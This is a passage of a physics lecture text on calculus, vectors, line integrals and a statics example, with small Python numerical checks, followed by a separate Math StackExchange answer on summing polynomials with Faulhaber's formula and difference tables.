(That’s why you write the expression down again, in case you don’t want to lose it.) Now, you look at each term and you draw a bar—a divider—and you put the term in the denominator: The first term is $1+2t^2$ that goes in the denominator. The power of the term goes in front (it’s the first power, $1$), and the derivative of the term (by our practice game), $4t$, goes in the numerator. That’s one term: \begin{aligned} &\frac{6(1+2t^2)(t^3-t)^2}{\sqrt{t+5t^2}(4t)^{3/2}}\cdot\Bigg[1\frac{4t}{1+2t^2}\\[.5ex] &+\frac{\sqrt{1+2t}}{t+\sqrt{1+t^2}}\cdot\Bigg[ \end{aligned} \label{Eq:TIPS:1:5} (What about the $6$? Forget it! Any number in front doesn’t make any difference: if you wanted to, you could start out, “$6$ goes in the denominator; its power, $1$, goes in front; and its derivative, $0$, goes in the numerator.”) Next term: $t^3-t$ goes in the denominator; the power, $+2$, goes in front; the derivative, $3t^2-1$, goes in the numerator. The next term, $t+5t^2$, goes in the denominator; the power, $-1/2$ (the inverse square root is a negative half power), goes in front; the derivative, $1+10t$, goes in the numerator. The next term, $4t$, goes in the denominator; its power, $-3/2$, goes in front; its derivative, $4$, goes in the numerator. Close the bracket. That’s one summand: \begin{aligned} &\frac{6(1+2t^2)(t^3-t)^2}{\sqrt{t+5t^2}(4t)^{3/2}}\cdot\Bigg[ 1\frac{4t}{1+2t^2} + 2\frac{3t^2-1}{t^3-t} -\frac12\frac{1+10t}{t+5t^2} - \frac32\frac4{4t}\Bigg]\\[.5ex] &+\frac{\sqrt{1+2t}}{t+\sqrt{1+t^2}}\cdot\Bigg[ \end{aligned} \label{Eq:TIPS:1:6} Next summand, first term: the power is $+1/2$. The object whose power we’re taking is $1+2t$, the derivative is $2$.
The power of the next term, $t+\sqrt{1+t^2}$, is $-1$. (You see, it’s a reciprocal.) The term goes in the denominator, and its derivative (this is the only hard one, relatively) has two pieces, because it’s a sum: $1+\cfrac{1}{2}\dfrac{2t}{\sqrt{1+t^2}}$. Close the bracket: \begin{aligned} &\frac{6(1+2t^2)(t^3-t)^2}{\sqrt{t+5t^2}(4t)^{3/2}}\cdot\Bigg[ 1\frac{4t}{1+2t^2} + 2\frac{3t^2-1}{t^3-t} -\frac12\frac{1+10t}{t+5t^2} - \frac32\frac4{4t}\Bigg]\\[.5ex] &+\frac{\sqrt{1+2t}}{t+\sqrt{1+t^2}}\cdot\Bigg[ \frac12\frac2{(1+2t)} - 1\frac{1+\cfrac12\dfrac{2t}{\sqrt{1+t^2}}}{t+\sqrt{1+t^2}}\Bigg] \end{aligned} \label{Eq:TIPS:1:7} That’s the derivative of the original expression. So, you see, that by memorizing this technique, you can differentiate anything—except sines, cosines, logs, and so on, but you can learn the rules for those easily; they’re very simple. And then you can use this technique even when the terms include tangents and everything else. I noticed when I wrote it down you were worried that it was such a complicated expression, but I think you can appreciate now that this is a really powerful method of differentiation because it gives the answer—boom—without any delay, no matter how complicated. The idea here is that the derivative of a function $f = k\cdot u^a\cdot v^b\cdot w^c\dots$ with respect to $t$ is $$\label{Eq:TIPS:1:8} \ddt{f}{t} = f\cdot\Bigg[a\frac{du/dt}{u}+b\frac{dv/dt}{v}+c\frac{dw/dt}{w}+\dots\Bigg]$$ (where $k$ and $a, b, c\dots$ are constants).
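The bracket rule of Eq. (1.8) is, in modern language, the logarithmic derivative of a product of powers. A small Python sketch (an editor’s check, not from the lecture; the sample function is my own choice) applies it to $f = 6\,(1+2t^2)^1(t^3-t)^2$ and compares the result with a finite difference:

```python
# Eq. (1.8): for f = k * u^a * v^b, df/dt = f * (a*u'/u + b*v'/v),
# valid wherever u and v are nonzero.
def f(t):
    return 6 * (1 + 2*t**2) * (t**3 - t)**2

def df_bracket(t):
    u, du = 1 + 2*t**2, 4*t         # first factor, power 1, and its derivative
    v, dv = t**3 - t, 3*t**2 - 1    # second factor, power 2, and its derivative
    return f(t) * (1 * du/u + 2 * dv/v)

t, h = 2.0, 1e-6
approx = (f(t + h) - f(t - h)) / (2 * h)   # centered finite difference
assert abs(df_bracket(t) - approx) < 1e-3 * abs(approx)
```

At $t=2$ both methods give $f'(2)=8856$, which also agrees with the ordinary product rule worked out by hand.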
However, in this physics course, I doubt any of the problems will be that complicated, so we probably won’t have any opportunity to use this. Anyway, that’s the way I differentiate, and I’m pretty good at it now, so there we are.

### 1–5 Integration

Now, the opposite process is integration. You should equally well learn to integrate as rapidly as possible. Integration is not as easy as differentiation, but you should be able to integrate simple expressions in your head. It isn’t necessary to be able to integrate every expression; for example, $(t+7t^2)^{1/3}$ is not possible to integrate in an easy fashion, but the others below are. So, when you choose expressions to practice integration, be careful that they can be done easily: \begin{aligned} \int (1+6t)\,dt &= t + 3t^2\\[.5ex] \int (4t^2 + 2t^3)\,dt &=\frac{4t^3}3+\frac{t^4}2\\[.5ex] \int (1+2t)^3\,dt &= \frac{(1+2t)^4}8\\[.5ex] \int \sqrt{1+5t}\,dt &= \frac{2(1+5t)^{3/2}}{15}\\[.5ex] \int (t+7t^2)^{1/3}\,dt &= \text{???.} \end{aligned} \label{Eq:TIPS:1:9} I have nothing more to tell you about calculus. The rest is up to you: you have to practice differentiation and integration—and, of course, the algebra required to reduce horrors like Eq. (1.7). Practicing algebra and calculus in this dull way—that’s the first thing.

### 1–6 Vectors

The other branch of the mathematics that we’re involved in as a pure mathematical subject is vectors. You first have to know what vectors are, and if you haven’t got a feel for it, I don’t know what to do: we’d have to talk back and forth a while for me to appreciate your difficulty—otherwise I couldn’t explain. A vector is like a push that has a certain direction, or a speed that has a certain direction, or a movement that has a certain direction—and it’s represented on a piece of paper by an arrow in the direction of the thing.
For instance, we represent a force on something by an arrow that is pointing in the direction of the force, and the length of the arrow is a measure of the magnitude of the force in some arbitrary scale—a scale, however, which must be maintained for all the forces in the problem. If you make another force twice as strong, you represent that by an arrow twice as long. (See Fig. 1–1.) Now, there are operations that can be done with these vectors. That is, if there are two forces acting at the same time on an object—say, two people are pushing on a thing—then the two forces can be represented by two arrows $\FLPF$ and $\FLPF'$. When we draw a diagram of something like this, it is often convenient to place the tails of the arrows where the forces are applied, even though in general there’s no meaning to the location of vectors. (See Fig. 1–2.) If we want to know the net resultant force, or total force, it corresponds to adding the vectors, and we can draw this by moving the tail of one onto the head of the other. (They’re still the same vectors after you move them because they have the same direction and the same length.) Then $\FLPF+\FLPF'$ is the vector drawn from the tail of $\FLPF$ to the head of $\FLPF'$ (or from the tail of $\FLPF'$ to the head of $\FLPF$), as shown in Figure 1–3. This way of adding vectors is sometimes called the “parallelogram method.” On the other hand, suppose there are two forces acting on an object, but we only know one of them is $\FLPF'$; the other one, which we don’t know, we’ll call $\FLPX$. Then, if the total force on the object is known to be $\FLPF$, we have $\FLPF'+\FLPX = \FLPF$. And so, $\FLPX=\FLPF-\FLPF'$. Thus to find $\FLPX$ you have to take the difference of two vectors, and you can do that in either of two ways: you can take $-\FLPF'$, which is a vector in the opposite direction as $\FLPF'$, and add it to $\FLPF$. (See Fig. 1–4.)
Otherwise, $\FLPF-\FLPF'$ is simply the vector drawn from the head of $\FLPF'$ to the head of $\FLPF$. Now, the disadvantage of the second method is that you may have a tendency to draw the arrow as shown in Figure 1–5; although the direction and length of the difference is right, the application of the force is not located at the tail of the arrow—so watch out. In case you’re nervous about it, or there’s any confusion, use the first method. (See Fig. 1–6.) We can also project vectors in certain directions. For example, if we would like to know what the force is in the ‘$x$’ direction (called the component of the force in that direction) it’s easy: we just project $\FLPF$ down with a right angle onto the $x$ axis, and that gives the component of the force in that direction, which we call $F_x$. Mathematically, $F_x$ is the magnitude of $\FLPF$ (which I’ll write $|\FLPF|$) times the cosine of the angle that $\FLPF$ makes with the $x$ axis; this comes from the properties of the right triangle. (See Fig. 1–7.) $$\label{Eq:TIPS:1:10} F_x = |\FLPF|\cos\theta$$ Now, if $\FLPA$ and $\FLPB$ are added to make $\FLPC$, then the projections that are brought down to form a right angle in a given direction ‘$x$’, evidently add. So the components of the vector sum are the sum of the vector components, and that’s true of components in any direction. (See Fig. 1–8.) $$\label{Eq:TIPS:1:11} \FLPA + \FLPB = \FLPC \Rightarrow A_x + B_x = C_x.$$ Particularly convenient is the description of vectors in terms of their components on perpendicular axes, $x$ and $y$ (and $z$—there’s three dimensions in the world; I keep forgetting that, because I’m always drawing on a blackboard!). If we have a vector $\FLPF$ that is in the $x$-$y$ plane, and we know its component in the $x$ direction, that doesn’t completely define $\FLPF$, because there are many vectors in the $x$-$y$ plane that have the same component in the $x$ direction.
But if we also know $\FLPF$’s component in the $y$ direction, then $\FLPF$ is completely specified. (See Fig. 1–9.) The components of $\FLPF$ along the $x$, $y$, and $z$ axes can be written as $F_x$, $F_y$, and $F_z$; summing vectors is equivalent to summing their components, so if the components of another vector $\FLPF'$ are $F'_x$, $F'_y$, and $F'_z$, then $\FLPF+\FLPF'$ has the components $F_x+F'_x$, $F_y+F'_y$, and $F_z+F'_z$. That’s the easy part; now it gets a bit more difficult. There’s a way of multiplying two vectors to produce a scalar—a number that is the same in any coordinate system. (In fact, there’s a way of making a scalar out of one vector, and I’ll come back to that.) You see, if the coordinate axes change, then the components change—but the angle between vectors and their magnitudes stay the same. If $\FLPA$ and $\FLPB$ are vectors, and the angle between them is $\theta$, I can take the magnitude of $\FLPA$, times the magnitude of $\FLPB$ times the cosine of $\theta$, and call this number $\FLPA\cdot\FLPB$ (“$\FLPA$ dot $\FLPB$”). (See Fig. 1–10.) That number, called a “dot product” or a “scalar product,” is the same in all coordinate systems: $$\label{Eq:TIPS:1:12} \FLPA\cdot\FLPB = |\FLPA||\FLPB|\cos{\theta}$$ It is evident that since $|\FLPA|\cos{\theta}$ is the projection of $\FLPA$ onto $\FLPB$, $\FLPA\cdot\FLPB$ is equal to the projection of $\FLPA$ onto $\FLPB$ times the magnitude of $\FLPB$. Similarly, since $|\FLPB|\cos{\theta}$ is the projection of $\FLPB$ onto $\FLPA$, $\FLPA\cdot\FLPB$ also equals the projection of $\FLPB$ onto $\FLPA$ times the magnitude of $\FLPA$. However, I find for myself that $\FLPA\cdot\FLPB = |\FLPA||\FLPB|\cos{\theta}$ is the easiest way to remember what the dot product is; then I can always see the other relations immediately. The trouble is, of course, you have so many ways of saying the same thing that it’s no good to try to remember them all—a point that I’ll make, in a few minutes, more completely.
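As a quick numerical check of $|\FLPA||\FLPB|\cos\theta$, the following Python sketch (an editor’s illustration with made-up sample vectors) computes the dot product from magnitudes and the angle between two 2-D vectors, and compares it with the standard component sum $A_xB_x + A_yB_y$ as an independent way of getting the same number:

```python
import math

# |A||B|cos(theta), computed from magnitudes and the angle between the
# vectors, should match the component sum AxBx + AyBy.
Ax, Ay = 3.0, 4.0   # sample vector A
Bx, By = 5.0, 0.0   # sample vector B, along the x axis for clarity

magA = math.hypot(Ax, Ay)
magB = math.hypot(Bx, By)
theta = math.atan2(Ay, Ax) - math.atan2(By, Bx)  # angle between A and B

dot_from_angle = magA * magB * math.cos(theta)
dot_from_components = Ax * Bx + Ay * By

assert abs(dot_from_angle - dot_from_components) < 1e-9
```

With these sample vectors both routes give $15$: here $|\FLPA|=5$, $|\FLPB|=5$, and $\cos\theta = 3/5$.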
We can also define $\FLPA\cdot\FLPB$ in terms of the components of $\FLPA$ and $\FLPB$ on an arbitrary set of axes. If I were to take three mutually perpendicular axes, $x$, $y$, $z$, in some arbitrary orientation, then $\FLPA\cdot\FLPB$ will turn out to be $$\label{Eq:TIPS:1:13} \FLPA\cdot\FLPB = A_xB_x + A_yB_y + A_zB_z$$ It is not immediately self-evident how you get from $|\FLPA||\FLPB|\cos{\theta}$ to $A_xB_x + A_yB_y + A_zB_z$. Although I can prove it when I want to,3 it takes me too long, so I remember them both. When we take the dot product of a vector with itself, $\theta$ is $0$, and the cosine of $0$ is $1$, so \begin{equation*} \FLPA\cdot\FLPA = |\FLPA||\FLPA|\cos{0} = |\FLPA|^2. \end{equation*} In terms of components, it’s \begin{equation*} \FLPA\cdot\FLPA = A_x^2 + A_y^2 + A_z^2. \end{equation*} The positive square root of that number is the magnitude of the vector.

### 1–7 Differentiating vectors

Now, we can do what’s called differentiating the vectors. The derivative of a vector with respect to time is meaningless unless the vector depends on the time, of course. That means we have to imagine some vector that is different all the time: as time goes on, the vector keeps changing, and we want the rate of change. For example, the vector $\FLPA(t)$ might be the position, at time $t$, of an object that’s flying around. At the next moment, $t'$, the object has moved from $\FLPA(t)$ to $\FLPA(t')$; we would like to calculate the rate of change of $\FLPA$ at time $t$. The rule is the following: that in the interval $\Delta t = t' - t$, the thing has moved from $\FLPA(t)$ to $\FLPA(t')$ so the displacement is $\Delta\FLPA = \FLPA(t') - \FLPA(t)$, a difference vector from the old position to the new position. (See Fig. 1–11.) Of course, the shorter the interval $\Delta t$, the closer $\FLPA(t')$ is to $\FLPA(t)$. If you divide $\Delta\FLPA$ by $\Delta t$ and then take the limit as they both approach zero—that’s the derivative.
In this case, where $\FLPA$ is position, its derivative is a velocity vector; the velocity vector is in a direction tangent to the curve, because that’s the direction of the displacements; its magnitude you can’t get by looking at this picture, because it depends on how fast the thing is going along the curve. The magnitude of the velocity vector is the speed; it tells you how far the thing moves per unit time. So, that’s a definition of the velocity vector: it’s tangent to the path, and its magnitude is equal to the speed of motion on the path. (See Fig. 1–12.) $$\label{Eq:TIPS:1:14} \FLPv(t) = \ddt{\FLPA}{t} = \lim_{\Delta t \to 0}\frac{\Delta\FLPA}{\Delta t}$$ Incidentally, it is dangerous to draw both the position vector and the velocity vector in the same diagram, unless you’re being very careful—and since we’re having a little trouble understanding these things, I point out all the possible pitfalls that I can think of, because the next thing you might want to do is add $\FLPA$ to $\FLPv$ for some purpose. That’s not legitimate, because in order to really draw the velocity vector, you have to know the scale of time: the velocity vector is in a different scale than the position vector; in fact, they have different units. You can’t add positions and velocities together in general—and you can’t add them here. In order for me to actually draw the picture of any vector, I have to make a decision as to the scale. When we talked about forces, we said that so-and-so many newtons were going to be represented by $1$ inch (or $1$ meter, or whatever). And here, we have to say that so-and-so many meters per second is going to be represented by $1$ inch. Someone else could draw the picture with position vectors the same lengths as ours, but with the velocity vector one-third as long as ours—he’s just using a different scale for his velocity vector. There’s no unique way to draw the length of a vector because the choice of scale is arbitrary.
Now, the velocity in terms of $x$, $y$, and $z$ components is very easy, because, for example, the rate of change of the $x$ component of position is equal to the $x$ component of velocity, and so on. This is simply because the derivative is really a difference, and since the components of a difference vector equal the differences of the corresponding components, we have $$\label{Eq:TIPS:1:15} \left(\frac{\Delta\FLPA}{\Delta t}\right)_x\!= \frac{\Delta A_x}{\Delta t},\;\; \left(\frac{\Delta\FLPA}{\Delta t}\right)_y\!= \frac{\Delta A_y}{\Delta t},\;\; \left(\frac{\Delta\FLPA}{\Delta t}\right)_z\!= \frac{\Delta A_z}{\Delta t},$$ and then taking limits we have the components of the derivative: $$\label{Eq:TIPS:1:16} v_x = \ddt{A_x}{t},\;\;v_y = \ddt{A_y}{t},\;\;v_z = \ddt{A_z}{t}.$$ This is true for any direction: if I take the component of $\FLPA(t)$ in any direction, then the velocity vector component in that direction is the derivative of the component of $\FLPA(t)$ in that direction, with one serious warning: the direction must not change with time. You can’t say, “I’m gonna take the component of $\FLPA$ in the direction of $\FLPv$,” or something like that, because $\FLPv$ is moving. It’s only true that the derivative of the position component is equal to the velocity component if the direction in which you take the component is itself fixed. So equations (1.15) and (1.16) are only true for $x$, $y$, $z$, and other fixed axes; if the axes are turning while you’re trying to take the derivative, the formula is much more complicated. Those are some of the deviations and difficulties of differentiating vectors.
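Componentwise differentiation is easy to try out numerically. Here is a short Python sketch (an editor’s example with a path of my own choosing, not from the lecture): for circular motion $\FLPA(t) = (\cos t, \sin t)$, differencing each component gives the velocity components, and the speed comes out constant:

```python
import math

# The components of the velocity are the derivatives of the components
# of the position, here for the circular path A(t) = (cos t, sin t).
def position(t):
    return (math.cos(t), math.sin(t))

def velocity(t, h=1e-6):
    # centered finite difference, applied to each component separately
    (x1, y1), (x2, y2) = position(t - h), position(t + h)
    return ((x2 - x1) / (2*h), (y2 - y1) / (2*h))

t = 1.2
vx, vy = velocity(t)
assert abs(vx - (-math.sin(t))) < 1e-6   # d(cos t)/dt = -sin t
assert abs(vy - math.cos(t)) < 1e-6      # d(sin t)/dt =  cos t

# The speed is the magnitude of the velocity vector; on this circle it
# is 1 at every instant, even though the direction keeps changing.
assert abs(math.hypot(vx, vy) - 1.0) < 1e-6
```

Note that the velocity here is tangent to the circle, as the definition above says it must be.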
Of course, you can differentiate the derivative of a vector, then differentiate that, and so on. I called the derivative of $\FLPA$ “velocity,” but that’s only because $\FLPA$ is the position; if $\FLPA$ is something else, its derivative is something other than velocity. For example, if $\FLPA$ is the momentum, the time derivative of momentum equals the force, so the derivative of $\FLPA$ would be the force. And if $\FLPA$ were the velocity, the time derivative of the velocity is the acceleration, and so on. What I’ve been telling you is generally true of differentiating vectors, but here I’ve given only the example of positions and velocities.

### 1–8 Line integrals

Finally, there’s only one more thing that I have to talk about for vectors, and that is a horrible, complicated thing, called a “line integral”: $$\label{Eq:TIPS:1:17} \int_a^z \FLPF\cdot d\FLPs$$ We’ll take as an example that you have a certain vector field $\FLPF$, which you want to integrate along a curve $S$ from point $a$ to point $z$. Now, in order for this line integral to mean something, there must be some way of defining the value of $\FLPF$ at every point on $S$ between $a$ and $z$. If $\FLPF$ is defined as the force applied to an object at point $a$, but you can’t tell me how the force changes as you move along $S$, at least between $a$ and $z$, then “the integral of $\FLPF$ along $S$ from $a$ to $z$” makes no sense. (I said “at least,” because $\FLPF$ could be defined anywhere else too, but at least you must define it on the part of the curve that you are integrating along.) In a moment I’ll define the line integral of an arbitrary vector field along an arbitrary curve, but first let’s consider the case where $\FLPF$ is constant, and $S$ is a straight-line path from $a$ to $z$—a displacement vector, which I’ll call $\FLPs$. (See Fig. 1-13.)
Then, since $\FLPF$ is constant, we can take it outside the integral (just like ordinary integration), and the integral of $d\FLPs$ from $a$ to $z$ is just $\FLPs$, so the answer is $\FLPF\cdot\FLPs$. That’s the line integral for a constant force and a straight-line path—the easy case: $$\label{Eq:TIPS:1:18} \int_a^z \FLPF\cdot d\FLPs = \FLPF\cdot\int_a^z d\FLPs = \FLPF\cdot\FLPs.$$ (Remember that $\FLPF\cdot\FLPs$ is the component of the force in the direction of the displacement times the magnitude of the displacement; in other words, it’s simply the distance along the line times the component of force in that direction. There are a lot of other ways to look at it, too: it’s the component of the displacement in the direction of the force, times the magnitude of the force; it’s the magnitude of the force times the magnitude of the displacement, times the cosine of the angle between them. These are all equivalent.) More generally, the line integral is defined as follows. First, we break up the integral by dividing $S$ between $a$ and $z$ into $N$ equal segments: $\Delta S_1,\Delta S_2\dots\Delta S_N$. Then the integral along $S$ is the integral along $\Delta S_1$ plus the integral along $\Delta S_2$ plus the integral along $\Delta S_3$, and so on. We choose $N$ large so that we can approximate each $\Delta S_i$ by a little displacement vector $\Delta\FLPs_i$, over which $\FLPF$ has an approximately constant value $\FLPF_i$. (See Fig. 1-14.) Then, by the “constant force straight-line path” rule, segment $\Delta\FLPs_i$ contributes approximately $\FLPF_i\cdot\Delta\FLPs_i$ to the integral. So, if you add together $\FLPF_i\cdot\Delta\FLPs_i$ for $i$ equals $1$ to $N$, that’s an excellent approximation to the integral.
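As a numerical aside (not part of the lecture), the segment-by-segment sum just described is easy to sketch; the fields and the path below are arbitrary illustrative choices:

```python
def line_integral(F, path, N=10000):
    """Approximate the line integral of F along `path` by summing
    F_i . delta_s_i over N small segments.  `path(u)` maps u in [0, 1]
    to a point (x, y)."""
    total = 0.0
    prev = path(0.0)
    for i in range(1, N + 1):
        cur = path(i / N)
        mid = ((prev[0] + cur[0]) / 2, (prev[1] + cur[1]) / 2)
        Fx, Fy = F(mid)
        total += Fx * (cur[0] - prev[0]) + Fy * (cur[1] - prev[1])
        prev = cur
    return total

# Constant force, straight-line path: the answer should be F.s exactly.
F_const = lambda p: (3.0, 4.0)
straight = lambda u: (2.0 * u, 1.0 * u)            # displacement s = (2, 1)
print(round(line_integral(F_const, straight), 6))  # 10.0, i.e. 3*2 + 4*1

# A varying field: F = (y, x) is the gradient of xy, so the integral
# from (0,0) to (2,1) should come out to 2*1 = 2.
F_grad = lambda p: (p[1], p[0])
print(round(line_integral(F_grad, straight), 6))   # 2.0
```

The constant-force case reproduces the $\FLPF\cdot\FLPs$ rule; for a varying field the sum is only approximate, and taking $N$ larger and larger is exactly the limiting process of the definition.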
The integral is exactly equal to this sum only if we take the limit as $N$ goes to infinity: you take the segments as fine as you can; you take them a little finer than that, and you get the correct integral: $$\label{Eq:TIPS:1:19} \int_a^z \FLPF\cdot d\FLPs = \lim_{N \to \infty}\sum_{i=1}^N \FLPF_i\cdot\Delta\FLPs_i.$$ (This integral, of course, depends upon the curve—generally—though sometimes it doesn’t in the physics.) Well, then, that’s all there is to the mathematics that you have to know to do the physics—for now, at least—and these things, most particularly the calculus and the early parts of the vector theory, should become second nature. Some things—like the line integral—may not be second nature now, but they will be, eventually, as you use them more; they aren’t so vital yet, and that’s harder. The things you “gotta get into your head good,” right now, are the calculus, and the little things about taking the components of vectors in various directions.

### 1–9 A simple example

I’ll give one example—just a very simple one—to show how to take components of vectors. Suppose we have a machine of some kind, as illustrated in Figure 1-15: it’s got two rods connected by a pivot (like an elbow joint) with a big weight on it. The end of one rod is connected to the floor by a stationary pivot, and the end of the other rod has a rolling pivot that rolls along the floor in a slot—it’s part of a machine, see, and it’s going choo-choog, choo-choog—the roller’s going back and forth, the weight’s going up and down, and so on. Let’s say the weight is $2$ kg, the rods are $0.5$ meters long, and at a certain moment when the machine is standing still, the distance from the weight to the floor just happens to come out, luckily, to $0.4$ meters—so that we have a $\text{3-4-5}$ triangle, to make the arithmetic easier. (See Fig. 1-16.) (The arithmetic shouldn’t make any difference; the real difficulty is to get the ideas right.)
The problem is to figure out what horizontal push $\FLPP$ you have to make on the roller in order to hold that weight up. Now, I’m going to make an assumption that we will need in order to do the problem. We make the assumption that when a rod has pivots at both ends, then the net force is always directed along the rod. (It turns out to be true; you may feel it’s self-evident.) It would not necessarily be true if there were a pivot only at one end of the rod, because then I could push the rod sideways. But if there’s a pivot at both ends, I can only push along the rod. So let’s suppose that we know that—that the forces must lie in the directions of the rods. We also know something else from the physics: that the forces are equal and opposite at the ends of the rods. For example, whatever force is exerted by the rod on the roller must also be exerted by that rod, in the opposite direction, on the weight. So, that’s the problem: with these ideas about the properties of rods, we try to figure out what’s the horizontal force on the roller. I think the way I’d like to try to do it is this: the horizontal force exerted on the roller by the rod is a certain component of the net force on it. (Of course, there’s also a vertical component due to the “confining slot,” which is unknown and uninteresting; it’s part of the net force on the roller, which is exactly opposite the net force on the weight.) Therefore I can get the components of the force exerted on the roller by the rod—in particular, the horizontal component I want—if I can get the components of the force exerted by the rod on the weight. If I call the horizontal force on the weight $F_x$ then the horizontal force on the roller is $-F_x$ and the force needed to hold the weight up is equal and opposite to that, so $|\FLPP| = F_x$. The vertical force on the weight from the rod, $F_y$, is very easy: it’s simply equal to the weight of the thing, which is $2$ kg, times $g$, the gravitational constant. 
(Something else you have to know from physics—$g$ is 9.8, in the mks system.) $F_y$ is $2$ times $g$, or $19.6$ newtons, so the vertical force on the roller is $-19.6$ newtons. Now, how can I get the horizontal force? Answer: I get it by knowing that the net force must lie along the rod. If $F_y$ is $19.6$, and the net force lies along the rod, then how much must $F_x$ be? (See Fig. 1-17.) Well, we have the projections of the triangles, which have been designed very nicely, so that the ratio of the horizontal to the vertical sides is $3$ to $4$; that’s the same ratio as $F_x$ is to $F_y$ (I don’t care about the net force, $\FLPF$, here; I only need the force in the horizontal direction), and I already know what the vertical force is. So, the magnitude of the horizontal force—unknown—is to $19.6$ as $0.3$ is to $0.4$. Therefore I multiply $3/4$ by $19.6$ and I get: $$\label{Eq:TIPS:1:20} \begin{aligned} \frac{F_x}{19.6} &= \frac{0.3}{0.4}.\\[1.5ex] \therefore F_x &= \frac{0.3}{0.4} \times 19.6 = 14.7\text{ newtons}. \end{aligned}$$ We conclude that the horizontal force on the roller needed to hold the weight up is $14.7$ newtons. That’s the answer to this problem. Or is it? You see, you can’t do physics just by plugging in the formulas: you’ll never get anywhere without having something else besides knowing the rules, the formulas for projections, and all that stuff; you have to have a certain feeling for the real situation! I’ll make some more remarks about that in a minute, but here, in this particular problem, the difficulty is the following: the net force on the weight is not only from one rod, there’s also a force exerted on it by the other rod, in some direction, and I left that out when I made the analysis—so it’s all wrong! I also have to worry about the force that the rod with the stationary pivot exerts on the weight. Now it’s getting complicated: how can I figure out what that force is? Well, what is the net force of everything on the weight?
Just the gravity—it just balances the gravity; there is no force horizontally on the weight. So the clue by which I can find out how much “juice” there is along the rod with the stationary pivot, is to notice that it must exert just enough horizontally to balance the horizontal force that the other rod is exerting. Therefore, if I were to draw the force that the rod with the stationary pivot exerts, its horizontal component would be exactly opposite the horizontal component that the rod with the roller exerts, and the vertical components would be equal because of the identical $\text{3-4-5}$ triangles the rods make: both rods are pushing up the same amount because their horizontal components must balance—if the rods were different lengths, you’d have a little more work to do, but it’s the same idea. So, let’s start out with the weight again: the forces from the rods on the weight are the first things to get straightened out. So, let’s look at the forces from the rods on the weight. The reason I keep repeating this to myself is because otherwise I get the signs all mixed up: The force from the weight on the rods is the opposite of the force from the rods on the weight. I always have to start over after I get all balled up like this; I have to think it out again, and make up my mind as to what I want to talk about. So I say, “Look at the forces from the rods on the weight: there’s a force $\FLPF$, which is in the direction of one rod. Then there’s a force $\FLPF'$ in the direction of the other rod. Those are the only two forces, and they are in the directions of the rods.” Now, the net of these two forces—ahhhh! I’m beginning to see the light! The net of these two forces has no horizontal component, and a vertical component of $19.6$ newtons. Ah! Let me draw the picture again, since I did it wrong before. (See Fig. 1-18.) 
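As a numerical aside (not part of the lecture), the two attempts at the arithmetic can be replayed side by side: the first attempt projects the full $19.6$ newtons with the $3:4$ ratio, while the corrected version first halves the vertical load between the two identical rods, as just argued:

```python
g = 9.8                       # m/s^2, as used in the lecture
total_vertical = 2 * g        # 19.6 N held up by the two rods together

# First attempt (Eq. 1.20): attribute all 19.6 N to the rod with the roller.
F_x_wrong = (0.3 / 0.4) * total_vertical         # 14.7 N
# Corrected: the identical rods share the vertical load equally.
F_x = (0.3 / 0.4) * (total_vertical / 2)         # 7.35 N
print(round(F_x_wrong, 2), round(F_x, 2))        # 14.7 7.35
```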
The horizontal forces balance, therefore the vertical components add, and the $19.6$ newtons is not just the vertical component of the force from one rod, but the total from both; since each rod contributes half, the vertical component from the rod with the roller is only $9.8$ newtons. Now when we take the horizontal projection of this force, multiplying it by $3/4$ as we did before, we get the horizontal component of force from the rod with the roller on the weight, and that takes care of that: $$\label{Eq:TIPS:1:21} \begin{aligned} \frac{F_x}{9.8} &= \frac{0.3}{0.4}.\\[1.5ex] \therefore F_x &= \frac{0.3}{0.4} \times 9.8 = 7.35\text{ newtons}. \end{aligned}$$

### 1–10 Triangulation

I have a few moments left, so I’d like to make a little speech about the relation of the mathematics to the physics—which, in fact, was well illustrated by this little example. It will not do to memorize the formulas, and to say to yourself, “I know all the formulas; all I gotta do is figure out how to put ’em in the problem!” Now, you may succeed with this for a while, and the more you work on memorizing the formulas, the longer you’ll go on with this method—but it doesn’t work in the end. You might say, “I’m not gonna believe him, because I’ve always been successful: that’s the way I’ve always done it; I’m always gonna do it that way.” You are not always going to do it that way: you’re going to flunk—not this year, not next year, but eventually, when you get your job, or something—you’re going to lose along the line somewhere, because physics is an enormously extended thing: there are millions of formulas! It’s impossible to remember all the formulas—it’s impossible! And the great thing that you’re ignoring, the powerful machine that you’re not using, is this: suppose Figure 1-19 is a map of all the physics formulas, all the relations in physics. (It should have more than two dimensions, but let’s suppose it’s like that.)
Now, suppose that something happened to your mind, that somehow all the material in some region was erased, and there was a little spot of missing goo in there. The relations of nature are so nice that it is possible, by logic, to “triangulate” from what is known to what’s in the hole. (See Fig. 1-20.) And you can re-create the things that you’ve forgotten perpetually—if you don’t forget too much, and if you know enough. In other words, there comes a time—which you haven’t quite got to, yet—where you’ll know so many things that as you forget them, you can reconstruct them from the pieces that you can still remember. It is therefore of first-rate importance that you know how to “triangulate”—that is, to know how to figure something out from what you already know. It is absolutely necessary. You might say, “Ah, I don’t care; I’m a good memorizer! I know how to really memorize! In fact, I took a course in memory!” That still doesn’t work! Because the real utility of physicists—both to discover new laws of nature, and to develop new things in industry, and so on—is not to talk about what’s already known, but to do something new—and so they triangulate out from the known things: they make a “triangulation” that no one has ever made before. (See Fig. 1-21.) In order to learn how to do that, you’ve got to forget the memorizing of formulas, and to try to learn to understand the interrelationships of nature. That’s very much more difficult at the beginning, but it’s the only successful way. 1. No one went out. 2. Only men were admitted to Caltech in 1961. 3. See The Feynman Lectures on Physics (FLP) Vol. I, Section 11–7.
http://math.stackexchange.com/questions/97999/partial-sum-of-a-polynomial
# Partial Sum of a Polynomial [duplicate]

Possible Duplicate: why is $\sum\limits_{k=1}^{n} k^m$ a polynomial with degree $m+1$ in $n$

I'm searching for a way to find the partial sum of a polynomial. Is there any way of doing this formulaically instead of just guessing and checking? For example, $$\sum_{x=1}^n {x^{2}}=?$$ or $$\sum_{x=1}^n (4x^2+7x+2)=?$$

Because of linearity, it is enough to find $S_k(n)=\sum_{x=0}^nx^k$. This can be done with Bernoulli polynomials using Faulhaber's formula. A little computation using this information shows that, for example, $$\sum_{x=1}^N(4x^2+7x+2)=\frac{1}{6} \left(8 N^3+33 N^2+37 N\right).$$

You can also find a formula directly. The partial sums of a polynomial function are given by a polynomial function. Since the higher-order differences of the values of a polynomial function are eventually zero, you can go backwards and find an expression for the sum in terms of Newton polynomials, with coefficients the first element in each row of differences; see http://en.wikipedia.org/wiki/Newton_series#Newton.27s_series. For your example, the differences are

$0 \quad 13 \quad 45 \quad 104 \quad 198$

$13 \quad 32 \quad 59 \quad 94$

$19 \quad 27 \quad 35$

$8 \quad 8$

